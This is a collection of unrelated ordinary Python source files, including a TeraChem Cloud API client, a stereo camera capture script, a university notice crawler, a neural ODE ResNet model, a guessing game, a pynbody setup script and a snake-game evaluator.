+{"seq_id":"197597678","text":"from typing import Dict, List, Optional, Union\n\nfrom . import __version__\nfrom .config import settings\nfrom .http_client import _RequestsClient\nfrom .models import (\n AtomicInputOrList,\n FutureResult,\n FutureResultGroup,\n OptimizationInputOrList,\n)\n\n\nclass TCClient:\n \"\"\"Main client object to perform computations using TeraChem Cloud.\"\"\"\n\n def __init__(\n self,\n *,\n tccloud_username: Optional[str] = None,\n tccloud_password: Optional[str] = None,\n profile: Optional[str] = None,\n tccloud_domain: Optional[str] = None,\n ):\n \"\"\"\n Initialize a TCClient object.\n\n Parameters:\n tccloud_username: TeraChem Cloud username\n tccloud_password: TeraChem Cloud password\n profile: Authentication profile name\n tccloud_domain: Domain of TeraChem Cloud instance to connect to\n\n !!! Danger\n It is not recommended to pass your TeraChem Cloud username and password\n directly to a `TCClient`. Instead instantiate a client with no credentials\n `client = TCClient()` and then run `client.configure()` to securely set up\n your authentication credentials for TeraChem Cloud.\n \"\"\"\n self._client = _RequestsClient(\n tccloud_username=tccloud_username,\n tccloud_password=tccloud_password,\n profile=profile,\n tccloud_domain=tccloud_domain,\n )\n self._openapi_spec: Optional[Dict] = None\n\n def __repr__(self) -> str:\n return f\"{type(self).__name__}({self._client._tccloud_domain}, profile={self.profile})\"\n\n def _set_openapi_specification(self):\n \"\"\"Gets OpenAPI specification from TeraChem Cloud Server\"\"\"\n self._openapi_spec = self._client._request(\n \"get\", \"/openapi.json\", api_call=False\n )\n\n @property\n def version(self) -> str:\n \"\"\"Return tccloud version\"\"\"\n return __version__\n\n @property\n def profile(self) -> str:\n \"\"\"Profile being used for authentication with TeraChem Cloud.\n\n Returns:\n The name of the name of the credentials profile being used with\n the current client.\n\n NOTE: This is a note!\n \"\"\"\n return self._client._profile\n\n @property\n def supported_engines(self) -> List[str]:\n \"\"\"Compute engines currently supported by TeraChem Cloud.\n\n Returns:\n List of engines currently supported by TeraChem Cloud.\"\"\"\n if not self._openapi_spec:\n self._set_openapi_specification()\n try:\n assert self._openapi_spec is not None\n engines = self._openapi_spec[\"components\"][\"schemas\"][\"SupportedEngines\"][\n \"enum\"\n ]\n except IndexError:\n print(\"Cannot locate currently supported engines.\")\n engines = [\"\"]\n return engines\n\n @property\n def supported_procedures(self) -> List[str]:\n \"\"\"Compute procedures currently supported by TeraChem Cloud.\n\n Returns:\n List of procedures currently supported by TeraChem Cloud.\"\"\"\n if not self._openapi_spec:\n self._set_openapi_specification()\n try:\n assert self._openapi_spec is not None\n procedures = self._openapi_spec[\"components\"][\"schemas\"][\n \"SupportedProcedures\"\n ][\"enum\"]\n except IndexError:\n print(\"Cannot locate currently supported procedures.\")\n procedures = [\"\"]\n return procedures\n\n def hello_world(self, name: Optional[str] = None) -> str:\n \"\"\"A simple endpoint to check connectivity to TeraChem Cloud.\n\n Parameters:\n name: Your name\n\n Returns:\n A message from TeraChem Cloud if the client was able to successfully\n connect.\n \"\"\"\n return self._client.hello_world(name)\n\n def compute(\n self, input_data: AtomicInputOrList, engine: str, queue: Optional[str] = None\n ) -> Union[FutureResult, FutureResultGroup]:\n \"\"\"Submit a computation to TeraChem Cloud.\n\n Parameters:\n input_data: Defines the structure of the desired computation.\n engine: A string matching one of the `self.supported_engines`\n queue: The name of a private compute queue. If None, default queue is used\n\n Returns:\n Object providing access to a computation's eventual result. You can check a\n computation's status by runing `.status` on the `FutureResult` object or\n `.get()` to block and retrieve the computation's final result.\n \"\"\"\n if self.supported_engines is not None:\n assert (\n engine in self.supported_engines\n ), f\"Please use one of the following engines: {self.supported_engines}\"\n\n return self._client.compute(input_data, engine, queue)\n\n def compute_procedure(\n self,\n input_data: OptimizationInputOrList,\n procedure: str,\n queue: Optional[str] = None,\n ) -> Union[FutureResult, FutureResultGroup]:\n \"\"\"Submit a procedure computation to TeraChem Cloud\n\n Parameters:\n input_data: Defines the inputs for an optimization computation\n procedure: The name of the procedure, e.g., 'berny'\n queue: The name of a private compute queue. If None, default queue is used\n\n Returns:\n Object providing access to a computation's eventual result. You can check a\n computation's status by runing `.status` on the `FutureResult` object or\n `.get()` to block and retrieve the computation's final result.\n \"\"\"\n if self.supported_procedures is not None:\n assert (\n procedure in self.supported_procedures\n ), f\"Please use one of the following procedures: {self.supported_procedures}\"\n return self._client.compute_procedure(input_data, procedure, queue)\n\n def configure(\n self, profile: str = settings.tccloud_default_credentials_profile\n ) -> None:\n \"\"\"Configure profiles for authentication with TeraChem Cloud.\n\n Parameters:\n profile: Optional value to create a named profile for use with TeraChem\n Cloud. No value needs to be passed and most users will only have one\n login with TeraChem Cloud. TCClient will access the profile by\n default without a specific name being passed. Pass a value if you have\n multiple logins to TeraChem Cloud.\n Note:\n Configures `tccloud` to use the passed credentials automatically in the\n future. You will not need to run `.configure()` the next time you use the\n `tccloud`.\n\n \"\"\"\n print(\n f\"✅ If you don't get have an account please signup at: {settings.tccloud_domain}/signup\"\n )\n access_token, refresh_token = self._client._set_tokens_from_user_input()\n self._client.write_tokens_to_credentials_file(\n access_token, refresh_token, profile=profile\n )\n print(\n f\"'{profile}' profile configured! Username/password not required for future use of TCClient\"\n )\n","sub_path":"tccloud/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"169920913","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nvidL = cv2.VideoCapture(2)\r\nvidR = cv2.VideoCapture(0)\r\n# vidL.set(3,1280)\r\n# vidL.set(4,720)\r\n# vidR.set(3,1280)\r\n# vidR.set(4,720)\r\ndirectLeft=\"D:\\WORK\\python\\Image Processing\\Logitech\\Left\"\r\ndirectRight=\"D:\\WORK\\python\\Image Processing\\Logitech\\Right\"\r\n# window_width=1280\r\n# window_height=720\r\ni=0\r\n\r\n\r\nwhile (True):\r\n ret1, frameR = vidR.read()\r\n ret2, frameL = vidL.read()\r\n flipRV = cv2.flip(frameR, -1)\r\n cv2.imshow('frameRight',flipRV)\r\n cv2.imshow('frameLeft',frameL)\r\n if cv2.waitKey(1) & 0xFF == ord('s'):\r\n i+=1\r\n fileL=\"ImageL\"+str(i)+\".png\"\r\n fileR = \"ImageR\" + str(i) + \".png\"\r\n os.chdir(directLeft)\r\n cv2.imwrite(fileL,frameL)\r\n os.chdir(directRight)\r\n cv2.imwrite(fileR, flipRV)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\nvidR.release()\r\nvidL.release()\r\ncv2.destroyAllWindows()","sub_path":"Stereovision/captureimagefor testing.py","file_name":"captureimagefor testing.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"352561892","text":"import gzip\r\nimport json\r\nimport re\r\n\r\nfilepath = 'data/jawiki-country.json.gz'\r\n\r\n# イギリスに関する記事本文を返す\r\ndef read_Eng(filepath):\r\n with gzip.open(filepath, 'r') as r:\r\n for line in r:\r\n # 行のデータを読み込む\r\n data = json.loads(line)\r\n # イギリスに関する記事本文を出力する\r\n if data['title'] == 'イギリス':\r\n return data['text']\r\n\r\n# カテゴリの行か調べる\r\ndef is_category(s):\r\n return re.match(r'^\\[\\[Category:.+\\]\\]$',s)\r\n\r\ndef main():\r\n text = read_Eng(filepath).split('\\n')\r\n\r\n for line in text:\r\n if is_category(line):\r\n # カテゴリ名を抽出する\r\n ca = re.match(r'^\\[\\[Category:(.+)\\]\\]$',line)\r\n ca_name = ca.group(1).split('|')[0]\r\n print(ca_name)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"chap3/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"387063203","text":"from bs4 import BeautifulSoup as BS\nfrom selenium import webdriver\nimport urllib.request\nimport urllib.parse\nimport requests as rq\n\n# 몇 페이지를 크롤링할 것인지 입력한다. 4 pages.\nlastPage = 4\npageNum = 1\n\n# chromedriver 경로 : 같은 층에 있으므로 상대 ���로\npath = 'chromedriver.exe'\n\n\n\nwhile pageNum < lastPage+1:\n\n # url이 while 내에서 돌아야 하는 이유?\n # pageNum이 지속적으로 변하고 이를 반영해야 하기 때문이다.\n url = f'http://inform.chungbuk.ac.kr/bbs/bbs.php?db=notice&search=%C0%E5%C7%D0&searchKey=subject&category=&pgID=ID12415888101&page={pageNum}' \n\n\n\n##### 여기서부터 selenium 사용으로 크롬 드라이버 동작 #####\n driver = webdriver.Chrome(path)\n driver.get(url)\n soup = BS(driver.page_source, 'lxml')\n \n # 타이틀 정보만 수집한다.\n title_list = soup.select(\"#body_line > nobr > a > b\")\n\n # 날짜, 조회수 정보를 수집한다.\n date_view_list = soup.find_all(class_ = \"body_num\")\n\n # href 정보만 수집한다.\n href_list = soup.select(\"#body_line > nobr > a\")\n \n driver.quit()\n##### 여기까지 selenium 사용 및 필요 데이터 추출 완료 #####\n\n\n\n # 타이틀 정보 리스트를 파일로 추출\n file = open('jt_info_title.txt', 'a')\n for ti in title_list:\n file.write(ti.text + '\\n')\n file.close()\n\n # 날짜 정보 리스트를 파일로 추출\n idx = 0\n file = open('jt_info_date.txt', 'a')\n for li in date_view_list:\n if idx % 4 - 2 == 0:\n file.write(li.text + '\\n')\n idx += 1\n file.close()\n\n # 조회수 정보 리스트를 파일로 추출\n idx = 0\n file = open('jt_info_view.txt', 'a')\n for li in date_view_list:\n if idx % 4 - 3 == 0:\n file.write(li.text + '\\n')\n idx += 1\n file.close()\n \n # href 정보 리스트를 파일로 추출\n file = open('jt_info_href.txt', 'a')\n for hr in href_list:\n if 'href' in hr.attrs:\n file.write(\"https://inform.chungbuk.ac.kr\" + hr.attrs['href'] + '\\n')\n file.close()\n\n pageNum += 1 # 다음 페이지 데이터 추출\n","sub_path":"testpro1/Crawler_JT.py","file_name":"Crawler_JT.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"228166461","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport math\n\nimport numpy as np\nfrom copy import deepcopy\n\nclass PreBasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1,\\\n norm_layer = None, act_layer = None, param_norm=lambda x: x):\n super(PreBasicBlock, self).__init__()\n\n self.conv1 = param_norm(nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False))\n self.bn1 = norm_layer(planes)\n\n self.conv2 = param_norm(nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False))\n self.bn2 = norm_layer(planes)\n \n self.act = act_layer\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n param_norm(nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False))\n )\n\n def forward(self, x):\n out = self.conv1(self.act(self.bn1(x)))\n out = self.conv2(self.act(self.bn2(out)))\n out += self.shortcut(x)\n return out\n \n \n \nclass PreBasicBlock2(nn.Module):\n expansion = 1\n\n def __init__(self, dim, norm_layer = None, act_layer = None, param_norm=lambda x: x):\n super(PreBasicBlock2, self).__init__()\n in_planes = dim\n planes = dim\n stride = 1\n self.nfe = 0\n self.nbe = 0\n self.forward_t = list()\n self.backward_t = list()\n self.dt = list()\n self.conv1 = param_norm(nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False))\n # Replace BN to GN because BN doesn't work with our method normaly\n self.bn1 = norm_layer(planes)\n\n self.conv2 = param_norm(nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False))\n self.bn2 = norm_layer(planes)\n \n self.act = act_layer\n\n self.shortcut = nn.Sequential()\n\n def forward(self, t, x):\n self.nfe += 1\n if isinstance(x, tuple):\n x = x[0]\n out = self.bn1(x)\n out = self.act(out)\n out = self.conv1(out)\n \n out = self.bn2(x)\n out = self.act(out)\n out = self.conv2(out)\n \n return out\n\n \n\nclass PreResNet(nn.Module):\n def __init__(self, block, num_blocks, num_classes=10, ODEBlock_=None,\\\n norm_layers_ = (None, None, None),\\\n param_norm_layers_=(lambda x: x, lambda x: x, lambda x: x),\n act_layers_ = (None, None),\\\n in_planes_ = 64):\n '''\n norm_layers_: tuple of normalization layers for (BasicBlock, BasicBlock2, bn1)\n act_layers_: tuple of activation layers for (BasicBlock, BasicBlock2)\n \n '''\n \n super(PreResNet, self).__init__()\n self.in_planes = in_planes_\n self.ODEBlock = ODEBlock_\n \n self.ODEBlocks = []\n\n self.n_layers = len(num_blocks)\n self.n_features_linear = in_planes_\n \n self.conv1 = param_norm_layers_[2](nn.Conv2d(3, in_planes_, kernel_size=3, stride=1, padding=1, bias=False))\n \n\n \n self.layer1_1, self.layer1_2 = self._make_layer(in_planes_, num_blocks[0], stride=1,\n norm_layers_=norm_layers_[:2],\n param_norm_layers_=param_norm_layers_[:2],\n act_layers_=act_layers_)\n \n if self.n_layers >= 2:\n self.n_features_linear *= 2\n self.layer2_1, self.layer2_2 = self._make_layer(in_planes_*2, num_blocks[1], stride=2,\n norm_layers_ = norm_layers_[:2],\n param_norm_layers_=param_norm_layers_[:2],\n act_layers_ = act_layers_)\n \n if self.n_layers >= 3:\n self.n_features_linear *= 2\n self.layer3_1, self.layer3_2 = self._make_layer(in_planes_*4, num_blocks[2], stride=2,\n norm_layers_=norm_layers_[:2],\n param_norm_layers_=param_norm_layers_[:2],\n act_layers_=act_layers_)\n\n if self.n_layers >= 4:\n self.n_features_linear *= 2\n self.layer4_1, self.layer4_2 = self._make_layer(in_planes_*8, num_blocks[3], stride=2,\n norm_layers_=norm_layers_[:2],\n param_norm_layers_=param_norm_layers_[:2],\n act_layers_=act_layers_)\n \n self.bn1 = norm_layers_[2](self.n_features_linear * block.expansion)\n self.linear = nn.Linear(self.n_features_linear * block.expansion, num_classes)\n\n \n def _make_layer(self, planes, num_blocks, stride, norm_layers_, param_norm_layers_, act_layers_):\n '''\n num_blocks: tuple (num_ResBlocks, num_ODEBlocks)\n stride: stride of first conv layer in ResNet layer\n '''\n num_resblocks, num_odeblocks = num_blocks\n \n strides = [stride] + [1] * (num_resblocks + num_odeblocks - 1)\n layers_res = []\n layers_ode = []\n \n for stride in strides[:num_resblocks]:\n layers_res.append(PreBasicBlock(self.in_planes, planes, stride,\\\n norm_layer = norm_layers_[0],\\\n param_norm=param_norm_layers_[0],\\\n act_layer = act_layers_[0]))\n self.in_planes = planes * PreBasicBlock.expansion\n \n for stride in strides[num_resblocks:]:\n layers_ode.append(self.ODEBlock(PreBasicBlock2(self.in_planes,\\\n norm_layer = norm_layers_[1],\\\n param_norm=param_norm_layers_[1],\\\n act_layer = act_layers_[1])))\n \n self.ODEBlocks += layers_ode\n \n return nn.Sequential(*layers_res), nn.Sequential(*layers_ode)\n\n # self.forward_t = list()\n # self.backward_t = list()\n # self.dt = list()\n @property\n def nfe(self):\n return {idx: layer.nfe for idx, layer in enumerate(self.ODEBlocks)}\n\n @nfe.setter\n def nfe(self, value):\n for layer in self.ODEBlocks:\n layer.nfe = value\n\n @property\n def nbe(self):\n return {idx: layer.nbe for idx, layer in enumerate(self.ODEBlocks)}\n\n @nbe.setter\n def nbe(self, value):\n for layer in self.ODEBlocks:\n layer.nbe = value\n\n @property\n def forward_t(self):\n return {idx: np.mean(layer.forward_t) for idx, layer in enumerate(self.ODEBlocks)}\n\n @forward_t.setter\n def forward_t(self, value):\n for layer in self.ODEBlocks:\n layer.forward_t = deepcopy(value)\n\n @property\n def backward_t(self):\n return {idx: np.mean(layer.backward_t) for idx, layer in enumerate(self.ODEBlocks)}\n\n @backward_t.setter\n def backward_t(self, value):\n for layer in self.ODEBlocks:\n layer.backward_t = deepcopy(value)\n\n @property\n def dt(self):\n return {idx: layer.dt for idx, layer in enumerate(self.ODEBlocks)}\n\n @dt.setter\n def dt(self, value):\n for layer in self.ODEBlocks:\n layer.dt = deepcopy(value)\n\n @property\n def f_t(self):\n return {idx: layer.f_t for idx, layer in enumerate(self.ODEBlocks)}\n\n @property\n def z_t(self):\n return {idx: layer.z_t for idx, layer in enumerate(self.ODEBlocks)}\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.layer1_1(out)\n out = self.layer1_2(out)\n if self.n_layers >= 2:\n out = self.layer2_1(out)\n out = self.layer2_2(out)\n if self.n_layers >= 3:\n out = self.layer3_1(out)\n out = self.layer3_2(out)\n if self.n_layers >= 3:\n out = self.layer4_1(out)\n out = self.layer4_2(out)\n \n out = F.relu(self.bn1(out))\n \n out = F.avg_pool2d(out, out.shape[-1])\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n\ndef PreResNet4(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(0, 1)]\n else:\n num_blocks = [(1, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes)\n\n \ndef PreResNet6(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(1, 1)]\n else:\n num_blocks = [(2, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes) \n\n \ndef PreResNet10(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(1, 1), (1, 1)]\n else:\n num_blocks = [(2, 0), (2, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes)\n\n \ndef PreResNet18(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(1, 1), (1, 1), (1, 1), (1, 1)]\n else:\n num_blocks = [(2, 0), (2, 0), (2, 0), (2, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes)\n\n \ndef PreResNet34(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(1, 2), (1, 3), (1, 5), (1, 2)]\n else:\n num_blocks = [(3, 0), (4, 0), (6, 0), (3, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes)\n \n\ndef lr_schedule(lr, epoch):\n optim_factor = 0\n if epoch > 250:\n optim_factor = 2\n elif epoch > 150:\n optim_factor = 1\n\n return lr / math.pow(10, (optim_factor))\n","sub_path":"models/preresnet.py","file_name":"preresnet.py","file_ext":"py","file_size_in_byte":10861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"581655136","text":"import random\r\nwhile True:\r\n num = random.randrange(1, 10)\r\n guesses = 0\r\n guess = input(\"Enter a number: \")\r\n if guess != \"exit\":\r\n while int(guess) != num:\r\n if int(guess) > num:\r\n print(\"Too high\")\r\n guesses += 1\r\n elif int(guess) < num:\r\n print(\"Too low\")\r\n guesses += 1\r\n guess = input(\"Enter a number: \")\r\n if guess == \"exit\":\r\n break\r\n if guess != \"exit\":\r\n guesses += 1\r\n print(\"Exactly Right. You took\", guesses, \"guesses\\n\")\r\n else:\r\n break\r\n","sub_path":"GuessingGame.py","file_name":"GuessingGame.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"210347692","text":"import os\nfrom distutils.core import setup, Extension\nfrom distutils.sysconfig import get_python_lib\n\nimport numpy\nimport numpy.distutils.misc_util\n\ntry : \n import pkg_resources\n import cython\n # check that cython version is > 0.15\n if float(pkg_resources.get_distribution(\"cython\").version.partition(\".\")[2]) < 15 : \n raise ImportError\n from Cython.Distutils import build_ext\n build_cython = True\n cmdclass = {'build_ext': build_ext}\nexcept:\n build_cython = False\n cmdclass = {}\n\nimport distutils.command.build_py\n\ntry : \n cmdclass['build_py'] = distutils.command.build_py.build_py_2to3\nexcept AttributeError:\n cmdclass['build_py'] = distutils.command.build_py.build_py\n\n\next_modules = []\nlibraries=[ ]\nextra_compile_args = ['-ftree-vectorizer-verbose=1', '-ftree-vectorize',\n '-fno-omit-frame-pointer',\n '-funroll-loops',\n '-fprefetch-loop-arrays',\n '-fstrict-aliasing',\n '-std=c99',\n '-Wall',\n '-O0']\n\nextra_link_args = []\n\nincdir = numpy.distutils.misc_util.get_numpy_include_dirs()\nincdir.append('pynbody/pkdgrav2')\nincdir.append('pynbody/pkdgrav2/mdl2/null')\n\n#os.path.join(get_python_lib(plat_specific=1), 'numpy/core/include')\nkdmain = Extension('pynbody/kdmain',\n sources = ['pynbody/kdmain.c', 'pynbody/kd.c', \n 'pynbody/smooth.c'],\n include_dirs=incdir,\n undef_macros=['DEBUG'],\n libraries=libraries,\n extra_compile_args=extra_compile_args,\n extra_link_args=extra_link_args)\n\ngravity = Extension('pynbody/pkdgrav',\n sources = ['pynbody/gravity/pkdgravlink.c',\n 'pynbody/pkdgrav2/cl.c',\n 'pynbody/pkdgrav2/cosmo.c',\n 'pynbody/pkdgrav2/ewald.c',\n 'pynbody/pkdgrav2/fio.c',\n 'pynbody/pkdgrav2/grav2.c',\n 'pynbody/pkdgrav2/ilc.c',\n 'pynbody/pkdgrav2/ilp.c',\n 'pynbody/pkdgrav2/listcomp.c',\n 'pynbody/pkdgrav2/mdl2/null/mdl.c',\n 'pynbody/pkdgrav2/moments.c',\n 'pynbody/pkdgrav2/outtype.c',\n 'pynbody/pkdgrav2/pkd.c',\n 'pynbody/pkdgrav2/psd.c',\n 'pynbody/pkdgrav2/romberg.c',\n 'pynbody/pkdgrav2/smooth.c',\n 'pynbody/pkdgrav2/smoothfcn.c',\n 'pynbody/pkdgrav2/rbtree.c',\n 'pynbody/pkdgrav2/tree.c',\n 'pynbody/pkdgrav2/walk2.c'],\n include_dirs=incdir,\n undef_macros=['DEBUG','INSTRUMENT'],\n define_macros=[('HAVE_CONFIG_H',None),\n ('__USE_BSD',None)],\n libraries=libraries,\n extra_compile_args=extra_compile_args,\n extra_link_args=extra_link_args)\n\next_modules += [kdmain]\n#ext_modules += [gravity]\n\nif build_cython : \n gravity_omp = Extension('pynbody.grav_omp',\n sources = [\"pynbody/gravity/direct_omp.pyx\"],\n include_dirs=incdir,\n extra_compile_args=['-fopenmp'],\n extra_link_args=['-fopenmp'])\n chunkscan = Extension('pynbody.chunk.scan',\n sources=['pynbody/chunk/scan.pyx'],\n include_dirs=incdir)\n\nelse :\n gravity_omp = Extension('pynbody.grav_omp',\n sources = [\"pynbody/gravity/direct_omp.c\"],\n include_dirs=incdir,\n extra_compile_args=['-fopenmp'],\n extra_link_args=['-fopenmp'])\n chunkscan = Extension('pynbody.chunk.scan',\n sources=['pynbody/chunk/scan.c'],\n include_dirs=incdir)\n \next_modules += [gravity_omp, chunkscan]\n \n\n\ndist = setup(name = 'pynbody',\n author = 'The pynbody team',\n author_email = 'pynbody@googlegroups.com',\n version = '0.19alpha',\n description = 'Light-weight astronomical N-body/SPH analysis for python',\n url = 'https://code.google.com/p/pynbody/downloads/list',\n package_dir = {'pynbody/': ''},\n packages = ['pynbody', 'pynbody/analysis', 'pynbody/bc_modules', \n 'pynbody/plot', 'pynbody/gravity', 'pynbody/chunk' ],\n# treat weave .c files like data files since weave takes\n# care of their compilation for now\n# could make a separate extension for them in future\n package_data={'pynbody': ['default_config.ini', \n 'sph_image.c','sph_to_grid.c',\n 'sph_spectra.c'],\n 'pynbody/analysis': ['cmdlum.npz',\n 'ionfracs.npz',\n 'interpolate.c',\n 'interpolate3d.c',\n 'com.c',\n 'CAMB_WMAP7'],\n 'pynbody/plot': ['tollerud2008mw'],\n 'pynbody/gravity': ['direct.c']},\n ext_modules = ext_modules,\n cmdclass = cmdclass,\n classifiers = [\"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n \"Programming Language :: Python :: 2\",\n \"Topic :: Scientific/Engineering :: Astronomy\",\n \"Topic :: Scientific/Engineering :: Visualization\"]\n \n )\n\n#if dist.have_run.get('install'):\n# install = dist.get_command_obj('install')\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"29549484","text":"import numpy as np\n\nfrom agent.dqn.rl_agent import get_observations\nfrom agent.greedy.greedy_agent import greedy_snake, make_grid_map\nfrom agent.dqn.rl_agent import agent as dqn_snake\nfrom env.chooseenv import make\nfrom tabulate import tabulate\nimport argparse\n\n\ndef print_state(state, actions, step):\n state = np.array(state)\n state = np.squeeze(state, axis=2)\n print(f'----------------- STEP:{step} -----------------')\n print(f'state:\\n{state}')\n print(f'actions: {actions}\\n')\n\n\ndef get_actions(state, algo):\n\n actions = np.random.randint(4, size=1)\n\n # dqn\n if algo == 'dqn':\n agent_trained_index = [0] # todo\n obs = get_observations(state, agent_trained_index, obs_dim=18)\n actions[:] = dqn_snake.choose_action(obs)\n\n # greedy\n if algo == 'greedy':\n greedy_info = get_greedy_info(state)\n\n actions[:] = greedy_snake(greedy_info['state'],\n greedy_info['beans'],\n greedy_info['snakes'],\n greedy_info['width'],\n greedy_info['height'],\n greedy_info['ctrl_agent_index'])[:]\n\n return actions\n\ndef get_greedy_info(observation):\n obs = observation.copy()\n ctrl_agent_index = [obs['controlled_snake_index']]\n board_width = obs['board_width']\n board_height = obs['board_height']\n beans_positions = obs[1]\n snakes_positions = {key: obs[key] for key in obs.keys() & {2, 3}}\n snake_map = make_grid_map(board_width, board_height, beans_positions, snakes_positions)\n state_map = np.squeeze(np.array(snake_map), axis=2)\n\n greedy_info = {'state': state_map,\n 'beans': beans_positions,\n 'snakes': snakes_positions,\n 'width': board_width,\n 'height': board_height,\n 'ctrl_agent_index': ctrl_agent_index}\n return greedy_info\n\n\n # greedy_snake(state_map, beans_positions, snakes_positions, board_width, board_height, ctrl_agent_index)\n\ndef get_join_actions(obs, algo_list):\n first_action = get_actions(obs[0], algo_list[0])\n second_action = get_actions(obs[1], algo_list[1])\n actions = np.zeros(2)\n actions[0] = first_action[:]\n actions[1] = second_action[:]\n return actions\n\n\ndef run_game(env, algo_list, episode, verbose=False):\n width = env.board_width\n height = env.board_height\n obs_dim = 18\n agent_index = [0, 1]\n total_reward = np.zeros(2)\n num_win = np.zeros(3)\n\n for i in range(1, episode + 1):\n episode_reward = np.zeros(2)\n state = env.reset()\n\n # obs = get_observations(state, agent_index, obs_dim, height, width)\n\n action_list = get_join_actions(state, algo_list)\n joint_action = env.encode(action_list)\n\n step = 0\n if verbose:\n print_state(state, action_list, step)\n\n while True:\n next_state, reward, done, _, info = env.step(joint_action)\n episode_reward += reward\n\n if done:\n if np.sum(episode_reward[0]) > np.sum(episode_reward[1]):\n num_win[0] += 1\n elif np.sum(episode_reward[0]) < np.sum(episode_reward[1]):\n num_win[1] += 1\n else:\n num_win[2] += 1\n\n if not verbose:\n print('.', end='')\n if i % 100 == 0 or i == episode:\n print()\n break\n\n state = next_state\n step += 1\n # obs = get_observations(state, info, agent_index, obs_dim, height, width)\n\n action_list = get_join_actions(state, algo_list)\n joint_action = env.encode(action_list)\n\n if verbose:\n print_state(state, action_list, step)\n\n total_reward += episode_reward\n\n # calculate results\n total_reward /= episode\n print(f'\\nResult base on {episode} ', end='')\n print('episode:') if episode == 1 else print('episodes:')\n\n header = ['Name', algo_list[0], algo_list[1]]\n data = [['score', total_reward[0], total_reward[1]],\n ['win', num_win[0], num_win[1]]]\n print(tabulate(data, headers=header, tablefmt='pretty', floatfmt='.3f'))\n\n\nif __name__ == \"__main__\":\n env_type = 'snakes_1v1'\n\n game = make(env_type, conf=None)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--my_ai\", default=\"dqn\", help=\"dqn/random/greedy\")\n parser.add_argument(\"--opponent\", default=\"greedy\", help=\"dqn/random/greedy\")\n parser.add_argument(\"--episode\", default=100)\n args = parser.parse_args()\n\n # [greedy, dqn, random]\n agent_list = [args.my_ai, args.opponent]\n run_game(game, algo_list=agent_list, episode=args.episode, verbose=False)\n","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
